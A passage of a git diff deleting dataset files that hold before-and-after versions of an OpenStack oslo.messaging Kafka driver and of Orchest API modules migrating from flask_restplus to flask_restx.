are created - # This is a workaround mainly for functional tests, in real life - # this is fine if topics are not created synchroneously - self.poll(5) - - @base.batch_poll_helper - def poll(self, timeout=None): - while not self._stopped.is_set(): - if self.incoming_queue: - return self.incoming_queue.pop(0) - try: - messages = self.conn.consume(timeout=timeout) or [] - for message in messages: - msg = OsloKafkaMessage(*unpack_message(message)) - self.incoming_queue.append(msg) - except driver_common.Timeout: - return None - - def stop(self): - self._stopped.set() - self.conn.stop_consuming() - - def cleanup(self): - self.conn.close() - - -class KafkaDriver(base.BaseDriver): - """Note: Current implementation of this driver is experimental. - We will have functional and/or integrated testing enabled for this driver. 
- """ - - def __init__(self, conf, url, default_exchange=None, - allowed_remote_exmods=None): - conf = kafka_options.register_opts(conf, url) - super(KafkaDriver, self).__init__( - conf, url, default_exchange, allowed_remote_exmods) - - self.listeners = [] - self.virtual_host = url.virtual_host - self.pconn = ProducerConnection(conf, url) - - def cleanup(self): - self.pconn.close() - for c in self.listeners: - c.close() - self.listeners = [] - - def send(self, target, ctxt, message, wait_for_reply=None, timeout=None, - call_monitor_timeout=None, retry=None): - raise NotImplementedError( - 'The RPC implementation for Kafka is not implemented') - - def send_notification(self, target, ctxt, message, version, retry=None): - """Send notification to Kafka brokers - - :param target: Message destination target - :type target: oslo_messaging.Target - :param ctxt: Message context - :type ctxt: dict - :param message: Message payload to pass - :type message: dict - :param version: Messaging API version (currently not used) - :type version: str - :param call_monitor_timeout: Maximum time the client will wait for the - call to complete before or receive a message heartbeat indicating - the remote side is still executing. - :type call_monitor_timeout: float - :param retry: an optional default kafka consumer retries configuration - None means to retry forever - 0 means no retry - N means N retries - :type retry: int - """ - self.pconn.notify_send(target_to_topic(target, - vhost=self.virtual_host), - ctxt, message, retry) - - def listen(self, target, batch_size, batch_timeout): - raise NotImplementedError( - 'The RPC implementation for Kafka is not implemented') - - def listen_for_notifications(self, targets_and_priorities, pool, - batch_size, batch_timeout): - """Listen to a specified list of targets on Kafka brokers - - :param targets_and_priorities: List of pairs (target, priority) - priority is not used for kafka driver - target.exchange_target.topic is used as - a kafka topic - :type targets_and_priorities: list - :param pool: consumer group of Kafka consumers - :type pool: string - """ - conn = ConsumerConnection(self.conf, self._url) - topics = set() - for target, priority in targets_and_priorities: - topics.add(target_to_topic(target, priority)) - - conn.declare_topic_consumer(topics, pool) - - listener = KafkaListener(conn) - return base.PollStyleListenerAdapter(listener, batch_size, - batch_timeout) diff --git a/v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.target.py b/v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.target.py deleted file mode 100644 index 1871be1..0000000 --- a/v1/data/codefile/openstack@oslo.messaging__5a842ae__oslo_messaging$_drivers$impl_kafka.py.target.py +++ /dev/null @@ -1,456 +0,0 @@ -# Copyright (C) 2015 Cisco Systems, Inc. -# -# Licensed under the Apache License, Version 2.0 (the "License"); you may -# not use this file except in compliance with the License. You may obtain -# a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT -# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the -# License for the specific language governing permissions and limitations -# under the License. 
- -import logging -import threading - -import confluent_kafka -from confluent_kafka import KafkaException -from oslo_serialization import jsonutils -from oslo_utils import eventletutils -from oslo_utils import importutils - -from oslo_messaging._drivers import base -from oslo_messaging._drivers import common as driver_common -from oslo_messaging._drivers.kafka_driver import kafka_options - -if eventletutils.EVENTLET_AVAILABLE: - tpool = importutils.try_import('eventlet.tpool') - -LOG = logging.getLogger(__name__) - - -def unpack_message(msg): - """Unpack context and msg.""" - context = {} - message = None - msg = jsonutils.loads(msg) - message = driver_common.deserialize_msg(msg) - context = message['_context'] - del message['_context'] - return context, message - - -def pack_message(ctxt, msg): - """Pack context into msg.""" - if isinstance(ctxt, dict): - context_d = ctxt - else: - context_d = ctxt.to_dict() - msg['_context'] = context_d - - msg = driver_common.serialize_msg(msg) - - return msg - - -def concat(sep, items): - return sep.join(filter(bool, items)) - - -def target_to_topic(target, priority=None, vhost=None): - """Convert target into topic string - - :param target: Message destination target - :type target: oslo_messaging.Target - :param priority: Notification priority - :type priority: string - :param priority: Notification vhost - :type priority: string - """ - return concat(".", [target.topic, priority, vhost]) - - -class ConsumerTimeout(KafkaException): - pass - - -class AssignedPartition(object): - """This class is used by the ConsumerConnection to track the - assigned partitions. - """ - def __init__(self, topic, partition): - super(AssignedPartition, self).__init__() - self.topic = topic - self.partition = partition - self.skey = '%s %d' % (self.topic, self.partition) - - def to_dict(self): - return {'topic': self.topic, 'partition': self.partition} - - -class Connection(object): - """This is the base class for consumer and producer connections for - transport attributes. - """ - - def __init__(self, conf, url): - - self.driver_conf = conf.oslo_messaging_kafka - self.security_protocol = self.driver_conf.security_protocol - self.sasl_mechanism = self.driver_conf.sasl_mechanism - self.ssl_cafile = self.driver_conf.ssl_cafile - self.url = url - self.virtual_host = url.virtual_host - self._parse_url() - - def _parse_url(self): - self.hostaddrs = [] - self.username = None - self.password = None - - for host in self.url.hosts: - # NOTE(ansmith): connections and failover are transparently - # managed by the client library. 
Credentials will be - # selectd from first host encountered in transport_url - if self.username is None: - self.username = host.username - self.password = host.password - else: - if self.username != host.username: - LOG.warning("Different transport usernames detected") - - if host.hostname: - self.hostaddrs.append("%s:%s" % (host.hostname, host.port)) - - def reset(self): - """Reset a connection so it can be used again.""" - pass - - -class ConsumerConnection(Connection): - """This is the class for kafka topic/assigned partition consumer - """ - def __init__(self, conf, url): - - super(ConsumerConnection, self).__init__(conf, url) - self.consumer = None - self.consumer_timeout = self.driver_conf.kafka_consumer_timeout - self.max_fetch_bytes = self.driver_conf.kafka_max_fetch_bytes - self.group_id = self.driver_conf.consumer_group - self.use_auto_commit = self.driver_conf.enable_auto_commit - self.max_poll_records = self.driver_conf.max_poll_records - self._consume_loop_stopped = False - self.assignment_dict = dict() - - def find_assignment(self, topic, partition): - """Find and return existing assignment based on topic and partition""" - skey = '%s %d' % (topic, partition) - return self.assignment_dict.get(skey) - - def on_assign(self, consumer, topic_partitions): - """Rebalance on_assign callback""" - assignment = [AssignedPartition(p.topic, p.partition) - for p in topic_partitions] - self.assignment_dict = {a.skey: a for a in assignment} - for t in topic_partitions: - LOG.debug("Topic %s assigned to partition %d", - t.topic, t.partition) - - def on_revoke(self, consumer, topic_partitions): - """Rebalance on_revoke callback""" - self.assignment_dict = dict() - for t in topic_partitions: - LOG.debug("Topic %s revoked from partition %d", - t.topic, t.partition) - - def _poll_messages(self, timeout): - """Consume messages, callbacks and return list of messages""" - msglist = self.consumer.consume(self.max_poll_records, - timeout) - - if ((len(self.assignment_dict) == 0) or (len(msglist) == 0)): - raise ConsumerTimeout() - - messages = [] - for message in msglist: - if message is None: - break - a = self.find_assignment(message.topic(), message.partition()) - if a is None: - LOG.warning(("Message for %s received on unassigned " - "partition %d"), - message.topic(), message.partition()) - else: - messages.append(message.value()) - - if not self.use_auto_commit: - self.consumer.commit(asynchronous=False) - - return messages - - def consume(self, timeout=None): - """Receive messages. 
- - :param timeout: poll timeout in seconds - """ - - def _raise_timeout(exc): - raise driver_common.Timeout(str(exc)) - - timer = driver_common.DecayingTimer(duration=timeout) - timer.start() - - poll_timeout = (self.consumer_timeout if timeout is None - else min(timeout, self.consumer_timeout)) - - while True: - if self._consume_loop_stopped: - return - try: - if eventletutils.is_monkey_patched('thread'): - return tpool.execute(self._poll_messages, poll_timeout) - return self._poll_messages(poll_timeout) - except ConsumerTimeout as exc: - poll_timeout = timer.check_return( - _raise_timeout, exc, maximum=self.consumer_timeout) - except Exception: - LOG.exception("Failed to consume messages") - return - - def stop_consuming(self): - self._consume_loop_stopped = True - - def close(self): - if self.consumer: - self.consumer.close() - self.consumer = None - - def declare_topic_consumer(self, topics, group=None): - conf = { - 'bootstrap.servers': ",".join(self.hostaddrs), - 'group.id': (group or self.group_id), - 'enable.auto.commit': self.use_auto_commit, - 'max.partition.fetch.bytes': self.max_fetch_bytes, - 'security.protocol': self.security_protocol, - 'sasl.mechanism': self.sasl_mechanism, - 'sasl.username': self.username, - 'sasl.password': self.password, - 'ssl.ca.location': self.ssl_cafile, - 'enable.partition.eof': False, - 'default.topic.config': {'auto.offset.reset': 'latest'} - } - LOG.debug("Subscribing to %s as %s", topics, (group or self.group_id)) - self.consumer = confluent_kafka.Consumer(conf) - self.consumer.subscribe(topics, - on_assign=self.on_assign, - on_revoke=self.on_revoke) - - -class ProducerConnection(Connection): - - def __init__(self, conf, url): - - super(ProducerConnection, self).__init__(conf, url) - self.batch_size = self.driver_conf.producer_batch_size - self.linger_ms = self.driver_conf.producer_batch_timeout * 1000 - self.producer = None - self.producer_lock = threading.Lock() - - def _produce_message(self, topic, message): - while True: - try: - self.producer.produce(topic, message) - except KafkaException as e: - LOG.error("Produce message failed: %s" % str(e)) - except BufferError: - LOG.debug("Produce message queue full, waiting for deliveries") - self.producer.poll(0.5) - continue - break - - self.producer.poll(0) - - def notify_send(self, topic, ctxt, msg, retry): - """Send messages to Kafka broker. 
- - :param topic: String of the topic - :param ctxt: context for the messages - :param msg: messages for publishing - :param retry: the number of retry - """ - retry = retry if retry >= 0 else None - message = pack_message(ctxt, msg) - message = jsonutils.dumps(message).encode('utf-8') - - try: - self._ensure_producer() - if eventletutils.is_monkey_patched('thread'): - return tpool.execute(self._produce_message, topic, message) - return self._produce_message(topic, message) - except Exception: - # NOTE(sileht): if something goes wrong close the producer - # connection - self._close_producer() - raise - - def close(self): - self._close_producer() - - def _close_producer(self): - with self.producer_lock: - if self.producer: - try: - self.producer.flush() - except KafkaException: - LOG.error("Flush error during producer close") - self.producer = None - - def _ensure_producer(self): - if self.producer: - return - with self.producer_lock: - if self.producer: - return - conf = { - 'bootstrap.servers': ",".join(self.hostaddrs), - 'linger.ms': self.linger_ms, - 'batch.num.messages': self.batch_size, - 'security.protocol': self.security_protocol, - 'sasl.mechanism': self.sasl_mechanism, - 'sasl.username': self.username, - 'sasl.password': self.password, - 'ssl.ca.location': self.ssl_cafile - } - self.producer = confluent_kafka.Producer(conf) - - -class OsloKafkaMessage(base.RpcIncomingMessage): - - def __init__(self, ctxt, message): - super(OsloKafkaMessage, self).__init__(ctxt, message) - - def requeue(self): - LOG.warning("requeue is not supported") - - def reply(self, reply=None, failure=None): - LOG.warning("reply is not supported") - - def heartbeat(self): - LOG.warning("heartbeat is not supported") - - -class KafkaListener(base.PollStyleListener): - - def __init__(self, conn): - super(KafkaListener, self).__init__() - self._stopped = threading.Event() - self.conn = conn - self.incoming_queue = [] - - # FIXME(sileht): We do a first poll to ensure we topics are created - # This is a workaround mainly for functional tests, in real life - # this is fine if topics are not created synchroneously - self.poll(5) - - @base.batch_poll_helper - def poll(self, timeout=None): - while not self._stopped.is_set(): - if self.incoming_queue: - return self.incoming_queue.pop(0) - try: - messages = self.conn.consume(timeout=timeout) or [] - for message in messages: - msg = OsloKafkaMessage(*unpack_message(message)) - self.incoming_queue.append(msg) - except driver_common.Timeout: - return None - - def stop(self): - self._stopped.set() - self.conn.stop_consuming() - - def cleanup(self): - self.conn.close() - - -class KafkaDriver(base.BaseDriver): - """Kafka Driver - - Note: Current implementation of this driver is experimental. 
- """ - - def __init__(self, conf, url, default_exchange=None, - allowed_remote_exmods=None): - conf = kafka_options.register_opts(conf, url) - super(KafkaDriver, self).__init__( - conf, url, default_exchange, allowed_remote_exmods) - - self.listeners = [] - self.virtual_host = url.virtual_host - self.pconn = ProducerConnection(conf, url) - - def cleanup(self): - self.pconn.close() - for c in self.listeners: - c.close() - self.listeners = [] - LOG.info("Kafka messaging driver shutdown") - - def send(self, target, ctxt, message, wait_for_reply=None, timeout=None, - call_monitor_timeout=None, retry=None): - raise NotImplementedError( - 'The RPC implementation for Kafka is not implemented') - - def send_notification(self, target, ctxt, message, version, retry=None): - """Send notification to Kafka brokers - - :param target: Message destination target - :type target: oslo_messaging.Target - :param ctxt: Message context - :type ctxt: dict - :param message: Message payload to pass - :type message: dict - :param version: Messaging API version (currently not used) - :type version: str - :param call_monitor_timeout: Maximum time the client will wait for the - call to complete before or receive a message heartbeat indicating - the remote side is still executing. - :type call_monitor_timeout: float - :param retry: an optional default kafka consumer retries configuration - None means to retry forever - 0 means no retry - N means N retries - :type retry: int - """ - self.pconn.notify_send(target_to_topic(target, - vhost=self.virtual_host), - ctxt, message, retry) - - def listen(self, target, batch_size, batch_timeout): - raise NotImplementedError( - 'The RPC implementation for Kafka is not implemented') - - def listen_for_notifications(self, targets_and_priorities, pool, - batch_size, batch_timeout): - """Listen to a specified list of targets on Kafka brokers - - :param targets_and_priorities: List of pairs (target, priority) - priority is not used for kafka driver - target.exchange_target.topic is used as - a kafka topic - :type targets_and_priorities: list - :param pool: consumer group of Kafka consumers - :type pool: string - """ - conn = ConsumerConnection(self.conf, self._url) - topics = [] - for target, priority in targets_and_priorities: - topics.append(target_to_topic(target, priority)) - - conn.declare_topic_consumer(topics, pool) - - listener = KafkaListener(conn) - return base.PollStyleListenerAdapter(listener, batch_size, - batch_timeout) diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.diff deleted file mode 100644 index 13585c4..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.diff +++ /dev/null @@ -1,11 +0,0 @@ -diff --git a/services/orchest-api/app/app/apis/__init__.py b/services/orchest-api/app/app/apis/__init__.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/apis/__init__.py - +++ b/services/orchest-api/app/app/apis/__init__.py -@@ -1,5 +1,5 @@ - from flask import Blueprint --from flask_restplus import Api -+from flask_restx import Api - - from app.apis.namespace_environment_builds import api as ns_env_builds - from app.apis.namespace_environment_images import api as ns_env_images diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.source.py 
b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.source.py deleted file mode 100644 index 24af84a..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.source.py +++ /dev/null @@ -1,29 +0,0 @@ -from flask import Blueprint -from flask_restplus import Api - -from app.apis.namespace_environment_builds import api as ns_env_builds -from app.apis.namespace_environment_images import api as ns_env_images -from app.apis.namespace_experiments import api as ns_experiments -from app.apis.namespace_pipelines import api as ns_pipelines -from app.apis.namespace_projects import api as ns_projects -from app.apis.namespace_runs import api as ns_runs -from app.apis.namespace_sessions import api as ns_sessions -from app.apis.namespace_validations import api as ns_validations - -blueprint = Blueprint("api", __name__) - -api = Api( - blueprint, - title="Orchest API", - version="1.0", - description="Back-end API for Orchest", -) - -api.add_namespace(ns_env_builds) -api.add_namespace(ns_env_images) -api.add_namespace(ns_experiments) -api.add_namespace(ns_pipelines) -api.add_namespace(ns_projects) -api.add_namespace(ns_runs) -api.add_namespace(ns_sessions) -api.add_namespace(ns_validations) diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.target.py deleted file mode 100644 index 921bcd3..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$__init__.py.target.py +++ /dev/null @@ -1,29 +0,0 @@ -from flask import Blueprint -from flask_restx import Api - -from app.apis.namespace_environment_builds import api as ns_env_builds -from app.apis.namespace_environment_images import api as ns_env_images -from app.apis.namespace_experiments import api as ns_experiments -from app.apis.namespace_pipelines import api as ns_pipelines -from app.apis.namespace_projects import api as ns_projects -from app.apis.namespace_runs import api as ns_runs -from app.apis.namespace_sessions import api as ns_sessions -from app.apis.namespace_validations import api as ns_validations - -blueprint = Blueprint("api", __name__) - -api = Api( - blueprint, - title="Orchest API", - version="1.0", - description="Back-end API for Orchest", -) - -api.add_namespace(ns_env_builds) -api.add_namespace(ns_env_images) -api.add_namespace(ns_experiments) -api.add_namespace(ns_pipelines) -api.add_namespace(ns_projects) -api.add_namespace(ns_runs) -api.add_namespace(ns_sessions) -api.add_namespace(ns_validations) diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.diff deleted file mode 100644 index 5fc711f..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/services/orchest-api/app/app/apis/namespace_environment_builds.py b/services/orchest-api/app/app/apis/namespace_environment_builds.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/apis/namespace_environment_builds.py - +++ b/services/orchest-api/app/app/apis/namespace_environment_builds.py -@@ -3,7 +3,7 @@ from datetime import datetime - - from 
celery.contrib.abortable import AbortableAsyncResult - from flask import abort, current_app, request --from flask_restplus import Namespace, Resource -+from flask_restx import Namespace, Resource - from sqlalchemy import desc, func, or_ - - import app.models as models diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.source.py deleted file mode 100644 index 6eb9a7d..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.source.py +++ /dev/null @@ -1,342 +0,0 @@ -import uuid -from datetime import datetime - -from celery.contrib.abortable import AbortableAsyncResult -from flask import abort, current_app, request -from flask_restplus import Namespace, Resource -from sqlalchemy import desc, func, or_ - -import app.models as models -from app import schema -from app.celery_app import make_celery -from app.connections import db -from app.utils import register_schema, update_status_db - -api = Namespace("environment-builds", description="Managing environment builds") -api = register_schema(api) - - -def abort_environment_build(environment_build_uuid, is_running=False): - """Aborts an environment build. - - Aborts an environment build by setting its state to ABORTED and - sending a REVOKE and ABORT command to celery. - - Args: - is_running: - environment_build_uuid: uuid of the environment build to abort - - Returns: - - """ - filter_by = { - "build_uuid": environment_build_uuid, - } - status_update = {"status": "ABORTED"} - celery_app = make_celery(current_app) - - # make use of both constructs (revoke, abort) - # so we cover both a task that is pending and a task which is running - celery_app.control.revoke(environment_build_uuid, timeout=1.0) - if is_running: - res = AbortableAsyncResult(environment_build_uuid, app=celery_app) - # it is responsibility of the task to terminate by reading it's aborted status - res.abort() - - update_status_db( - status_update, - model=models.EnvironmentBuild, - filter_by=filter_by, - ) - - -@api.route("/") -class EnvironmentBuildList(Resource): - @api.doc("get_environment_builds") - @api.marshal_with(schema.environment_builds) - def get(self): - """Fetches all environment builds (past and present). - - The environment builds are either PENDING, STARTED, SUCCESS, FAILURE, ABORTED - - """ - environment_builds = models.EnvironmentBuild.query.all() - if not environment_builds: - environment_builds = [] - - return ( - {"environment_builds": [envb.as_dict() for envb in environment_builds]}, - 200, - ) - - @api.doc("start_environment_builds") - @api.expect(schema.environment_build_requests) - @api.marshal_with( - schema.environment_builds, code=201, description="Queued environment build" - ) - def post(self): - """Queues a list of environment builds. - - Only unique requests are considered, meaning that a request - containing duplicate environment_build_requests will produce an - environment build only for each unique - environment_build_request. Note that requesting an - environment_build for an environment (identified by - project_uuid, environment_uuid, project_path) will REVOKE/ABORT - any other active (queued or actually started) environment build - for that environment. This implies that only an environment - build can be active (queued or actually started) for a given - environment. 
- """ - - # keep only unique requests - post_data = request.get_json() - builds_requests = post_data["environment_build_requests"] - builds_requests = set( - [ - (req["project_uuid"], req["environment_uuid"], req["project_path"]) - for req in builds_requests - ] - ) - builds_requests = [ - { - "project_uuid": req[0], - "environment_uuid": req[1], - "project_path": req[2], - } - for req in builds_requests - ] - - defined_builds = [] - celery = make_celery(current_app) - # start a celery task for each unique environment build request - for build_request in builds_requests: - - # check if a build for this project/environment is PENDING/STARTED - builds = models.EnvironmentBuild.query.filter( - models.EnvironmentBuild.project_uuid == build_request["project_uuid"], - models.EnvironmentBuild.environment_uuid - == build_request["environment_uuid"], - models.EnvironmentBuild.project_path == build_request["project_path"], - or_( - models.EnvironmentBuild.status == "PENDING", - models.EnvironmentBuild.status == "STARTED", - ), - ).all() - - for build in builds: - abort_environment_build(build.build_uuid, build.status == "STARTED") - - # We specify the task id beforehand so that we can commit to - # the db before actually launching the task, since the task - # might make some calls to the orchest-api referring to - # itself (e.g. a status update), and thus expecting to find - # itself in the db. This way we avoid race conditions. - task_id = str(uuid.uuid4()) - - # TODO: verify if forget has the same effect of - # ignore_result=True because ignore_result cannot be used - # with abortable tasks - # https://stackoverflow.com/questions/9034091/how-to-check-task-status-in-celery - # task.forget() - - environment_build = { - "build_uuid": task_id, - "project_uuid": build_request["project_uuid"], - "environment_uuid": build_request["environment_uuid"], - "project_path": build_request["project_path"], - "requested_time": datetime.fromisoformat(datetime.utcnow().isoformat()), - "status": "PENDING", - } - defined_builds.append(environment_build) - db.session.add(models.EnvironmentBuild(**environment_build)) - db.session.commit() - - # could probably do without this... 
-            celery_job_kwargs = {
-                "project_uuid": build_request["project_uuid"],
-                "environment_uuid": build_request["environment_uuid"],
-                "project_path": build_request["project_path"],
-            }
-
-            celery.send_task(
-                "app.core.tasks.build_environment",
-                kwargs=celery_job_kwargs,
-                task_id=task_id,
-            )
-
-        return {"environment_builds": defined_builds}
-
-
-@api.route(
-    "/<string:environment_build_uuid>",
-)
-@api.param("environment_build_uuid", "UUID of the EnvironmentBuild")
-@api.response(404, "Environment build not found")
-class EnvironmentBuild(Resource):
-    @api.doc("get_environment_build")
-    @api.marshal_with(schema.environment_build, code=200)
-    def get(self, environment_build_uuid):
-        """Fetch an environment build given its uuid."""
-        env_build = models.EnvironmentBuild.query.get_or_404(
-            ident=environment_build_uuid, description="EnvironmentBuild not found"
-        )
-        return env_build.as_dict()
-
-    @api.doc("set_environment_build_status")
-    @api.expect(schema.status_update)
-    def put(self, environment_build_uuid):
-        """Set the status of an environment build."""
-        status_update = request.get_json()
-
-        filter_by = {
-            "build_uuid": environment_build_uuid,
-        }
-        update_status_db(
-            status_update,
-            model=models.EnvironmentBuild,
-            filter_by=filter_by,
-        )
-
-        return {"message": "Status was updated successfully"}, 200
-
-    @api.doc("delete_environment_build")
-    @api.response(200, "Environment build cancelled or stopped")
-    def delete(self, environment_build_uuid):
-        """Stops an environment build given its UUID.
-
-        However, it will not delete any corresponding database entries,
-        it will update the status of corresponding objects to ABORTED.
-        """
-        # this first read is to make sure the build exists
-        environment_build = models.EnvironmentBuild.query.get_or_404(
-            environment_build_uuid,
-            description="EnvironmentBuildTask not found",
-        )
-
-        status = environment_build.status
-
-        if status != "PENDING" and status != "STARTED":
-            return (
-                {
-                    "message": "Environment build has state %s, no revocation or abortion necessary or possible"
-                    % status
-                },
-                200,
-            )
-
-        abort_environment_build(environment_build_uuid, status == "STARTED")
-
-        return {"message": "Environment build was successfully ABORTED"}, 200
-
-
-@api.route(
-    "/most-recent/<string:project_uuid>",
-)
-@api.param(
-    "project_uuid",
-    "UUID of the project for which environment builds should be collected",
-)
-class ProjectMostRecentBuildsList(Resource):
-    @api.doc("get_project_most_recent_environment_builds")
-    @api.marshal_with(schema.environment_builds, code=200)
-    def get(self, project_uuid):
-        """Get the most recent environment build for each environment of a project.
-
-        Only environments for which builds have already been requested
-        are considered. Meaning that environments that are part of a
-        project but have never been built won't be part of results.
-
-        """
-
-        # filter by project uuid
-        # use a window function to get the most recently requested build for each environment
-        # return
-        rank = (
-            func.rank()
-            .over(partition_by="environment_uuid", order_by=desc("requested_time"))
-            .label("rank")
-        )
-        query = db.session.query(models.EnvironmentBuild)
-        query = query.filter_by(project_uuid=project_uuid)
-        query = query.add_column(rank)
-        # note: this works because rank is of type Label and
-        # rank == 1 will evaluate to sqlalchemy.sql.elements.BinaryExpression since the equality
-        # operator is overloaded
-        query = query.from_self().filter(rank == 1)
-        query = query.with_entities(models.EnvironmentBuild)
-        env_builds = query.all()
-
-        return {"environment_builds": [build.as_dict() for build in env_builds]}
-
-
-@api.route("/most-recent/<string:project_uuid>/<string:environment_uuid>")
-@api.param("project_uuid", "UUID of the project.")
-@api.param("environment_uuid", "UUID of the environment.")
-class ProjectEnvironmentMostRecentBuild(Resource):
-    @api.doc("get_most_recent_build_by_proj_env")
-    @api.marshal_with(schema.environment_build, code=200)
-    def get(self, project_uuid, environment_uuid):
-        """Get the most recent environment build for a project_uuid, environment_uuid pair.
-        Only environments for which builds have already been requested are considered.
-        """
-
-        recent = (
-            db.session.query(models.EnvironmentBuild)
-            .filter_by(project_uuid=project_uuid, environment_uuid=environment_uuid)
-            .order_by(desc(models.EnvironmentBuild.requested_time))
-            .first()
-        )
-        if recent:
-            return recent.as_dict()
-        abort(404, "EnvironmentBuild not found")
-
-
-def delete_project_environment_builds(project_uuid, environment_uuid):
-    """Delete environment builds for an environment.
-
-    Environment builds that are in progress are stopped.
-
-    Args:
-        project_uuid:
-        environment_uuid:
-    """
-    # order by request time so that the first build might
-    # be related to a PENDING or STARTED build, all others
-    # are surely not PENDING or STARTED
-    env_builds = (
-        models.EnvironmentBuild.query.filter_by(
-            project_uuid=project_uuid, environment_uuid=environment_uuid
-        )
-        .order_by(desc(models.EnvironmentBuild.requested_time))
-        .all()
-    )
-
-    if len(env_builds) > 0 and env_builds[0].status in ["PENDING", "STARTED"]:
-        abort_environment_build(env_builds[0].build_uuid, True)
-
-    for build in env_builds:
-        db.session.delete(build)
-    db.session.commit()
-
-
-def delete_project_builds(project_uuid):
-    """Delete all environment builds for a project.
-
-    Environment builds that are in progress are stopped.
-
-    Args:
-        project_uuid:
-    """
-    builds = (
-        models.EnvironmentBuild.query.filter_by(project_uuid=project_uuid)
-        .with_entities(
-            models.EnvironmentBuild.project_uuid,
-            models.EnvironmentBuild.environment_uuid,
-        )
-        .distinct()
-        .all()
-    )
-
-    for build in builds:
-        delete_project_environment_builds(build.project_uuid, build.environment_uuid)
diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.target.py
deleted file mode 100644
index a89637e..0000000
--- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_environment_builds.py.target.py
+++ /dev/null
@@ -1,342 +0,0 @@
-import uuid
-from datetime import datetime
-
-from celery.contrib.abortable import AbortableAsyncResult
-from flask import abort, current_app, request
-from flask_restx import Namespace, Resource
-from sqlalchemy import desc, func, or_
-
-import app.models as models
-from app import schema
-from app.celery_app import make_celery
-from app.connections import db
-from app.utils import register_schema, update_status_db
-
-api = Namespace("environment-builds", description="Managing environment builds")
-api = register_schema(api)
-
-
-def abort_environment_build(environment_build_uuid, is_running=False):
-    """Aborts an environment build.
-
-    Aborts an environment build by setting its state to ABORTED and
-    sending a REVOKE and ABORT command to celery.
-
-    Args:
-        is_running:
-        environment_build_uuid: uuid of the environment build to abort
-
-    Returns:
-
-    """
-    filter_by = {
-        "build_uuid": environment_build_uuid,
-    }
-    status_update = {"status": "ABORTED"}
-    celery_app = make_celery(current_app)
-
-    # make use of both constructs (revoke, abort)
-    # so we cover both a task that is pending and a task which is running
-    celery_app.control.revoke(environment_build_uuid, timeout=1.0)
-    if is_running:
-        res = AbortableAsyncResult(environment_build_uuid, app=celery_app)
-        # it is the responsibility of the task to terminate by reading its aborted status
-        res.abort()
-
-    update_status_db(
-        status_update,
-        model=models.EnvironmentBuild,
-        filter_by=filter_by,
-    )
-
-
-@api.route("/")
-class EnvironmentBuildList(Resource):
-    @api.doc("get_environment_builds")
-    @api.marshal_with(schema.environment_builds)
-    def get(self):
-        """Fetches all environment builds (past and present).
-
-        The environment builds are either PENDING, STARTED, SUCCESS, FAILURE or ABORTED.
-
-        """
-        environment_builds = models.EnvironmentBuild.query.all()
-        if not environment_builds:
-            environment_builds = []
-
-        return (
-            {"environment_builds": [envb.as_dict() for envb in environment_builds]},
-            200,
-        )
-
-    @api.doc("start_environment_builds")
-    @api.expect(schema.environment_build_requests)
-    @api.marshal_with(
-        schema.environment_builds, code=201, description="Queued environment build"
-    )
-    def post(self):
-        """Queues a list of environment builds.
-
-        Only unique requests are considered, meaning that a request
-        containing duplicate environment_build_requests will produce an
-        environment build only for each unique
-        environment_build_request. Note that requesting an
-        environment_build for an environment (identified by
-        project_uuid, environment_uuid, project_path) will REVOKE/ABORT
-        any other active (queued or actually started) environment build
-        for that environment. This implies that only one environment
-        build can be active (queued or actually started) for a given
-        environment.
-        """
-
-        # keep only unique requests
-        post_data = request.get_json()
-        builds_requests = post_data["environment_build_requests"]
-        builds_requests = set(
-            [
-                (req["project_uuid"], req["environment_uuid"], req["project_path"])
-                for req in builds_requests
-            ]
-        )
-        builds_requests = [
-            {
-                "project_uuid": req[0],
-                "environment_uuid": req[1],
-                "project_path": req[2],
-            }
-            for req in builds_requests
-        ]
-
-        defined_builds = []
-        celery = make_celery(current_app)
-        # start a celery task for each unique environment build request
-        for build_request in builds_requests:
-
-            # check if a build for this project/environment is PENDING/STARTED
-            builds = models.EnvironmentBuild.query.filter(
-                models.EnvironmentBuild.project_uuid == build_request["project_uuid"],
-                models.EnvironmentBuild.environment_uuid
-                == build_request["environment_uuid"],
